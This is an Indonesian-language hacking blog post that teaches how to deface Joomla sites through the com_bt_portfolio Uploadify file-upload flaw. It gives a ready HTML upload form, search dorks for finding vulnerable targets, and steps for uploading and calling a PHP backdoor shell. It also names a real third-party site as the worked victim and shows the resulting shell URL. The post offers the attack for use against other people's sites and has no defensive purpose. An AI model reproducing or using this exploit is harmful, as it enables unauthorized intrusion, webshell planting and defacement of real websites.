Exploit Joomla Com_Bt_Portofolio - Uploadify

Holla ^-^ Kembali Lagi Dengan Saya Orang Tamfan wkwk ^^ Oke Langsung Saja Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~  Exp...


Holla ^-^

Kembali Lagi Dengan Saya Orang Tamfan wkwk ^^

Oke Langsung Saja Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~ Exploit Joomla Com_Bt_Portofolio - Uploadify ~

Bahan2 :

1. Siapkan Shell backd00r ~ Belum Punya ? Download di Google Bertebaran Dimana2 :))

2. Script CSRF :

<body>
<form action="http://www.TarGetMu.or.id/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php" method="post"
enctype="multipart/form-data"><input type="file"
name="Filedata"> <input
type="hidden"
name="folder" value="/administrator/components/com_bt_portfolio/"><input type="submit" value="OK">
</form>
</body>

Copy Paste Script CSRF di atas Ke Notepad ~ Save as .html ~
Yang Berwarna Ungu itu Diganti Dengan Target Kamu :)))

Sekarang Kita Cari Targetnya Dengan Dork Berikut :

" /templates/bt_foto " or " /templates/bt_metro

Dork Bisa Di Kembangkan Biar Manjur dan Sesuai Selera :))

Exploit Vulnerability Check : 

http://www.TargeTMu.co.li/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php

Copy Target Kamu Ke Script CSRF Tadi ~ Contoh Target Saya : 

http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php


Jadinya Seperti di Bawah ini : 

<body>
<form action="http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php" method="post"
enctype="multipart/form-data"><input type="file"
name="Filedata"> <input
type="hidden"
name="folder" value="/administrator/components/com_bt_portfolio/"><input type="submit" value="OK">
</form>

</body>

Lihat Gambar Kalau ga Ngerti ~



Lalu Save as ~ buka File CSRF tadi Lewat Browser kamu ~ Lalu Upload Shell ~



Kalau Berhasil Nanti Akan Muncul Teks Dimana Letak Shell Kalian Berada Se[erti ini :))



Tinggal Di Panggil Deh si Shell Backd00r itu wkwkw :)))

Jadinya Seperti ini ~ 

http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/Leovarisa.php


Terus Di Apain Lagi Kalau Dah Kaya Gitu :p ?
Terserah Kalian wkwk Mau di Cipok ~ Atau Mau di Kasih ane Juga Boleh wkwk :p



Oke Semoga Bermanfaat dah ^o^










COMMENTS

BLOGGER: 1
Loading...
Nama

Backd00r,2,Blogger Tutorial,2,Hacking,22,HTML,3,JKT48,7,News Update,7,Sharing,19,
ltr
item
[#] Cileungsi - Cyber [#]: Exploit Joomla Com_Bt_Portofolio - Uploadify
Exploit Joomla Com_Bt_Portofolio - Uploadify
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3VLcTTOtK8Xavw-2U-GO_0IYSYBuSqn8sUkE98xJ5y1jVU9VthSBm5ayj_4JxIzELnjZUIjF9SeI9bZf87dcfuyYQgqWVeStTB83hH_E2DwSTa1nXEbeEG1dc9_7T9LW9hlq6GReRew/s1600/wdwdw.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3VLcTTOtK8Xavw-2U-GO_0IYSYBuSqn8sUkE98xJ5y1jVU9VthSBm5ayj_4JxIzELnjZUIjF9SeI9bZf87dcfuyYQgqWVeStTB83hH_E2DwSTa1nXEbeEG1dc9_7T9LW9hlq6GReRew/s72-c/wdwdw.jpg
[#] Cileungsi - Cyber [#]
http://cileungsi-cyber.blogspot.com/2014/11/exploit-joomla-combtportofolio-uploadify.html
http://cileungsi-cyber.blogspot.com/
http://cileungsi-cyber.blogspot.com/
http://cileungsi-cyber.blogspot.com/2014/11/exploit-joomla-combtportofolio-uploadify.html
true
3330362658088368293
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy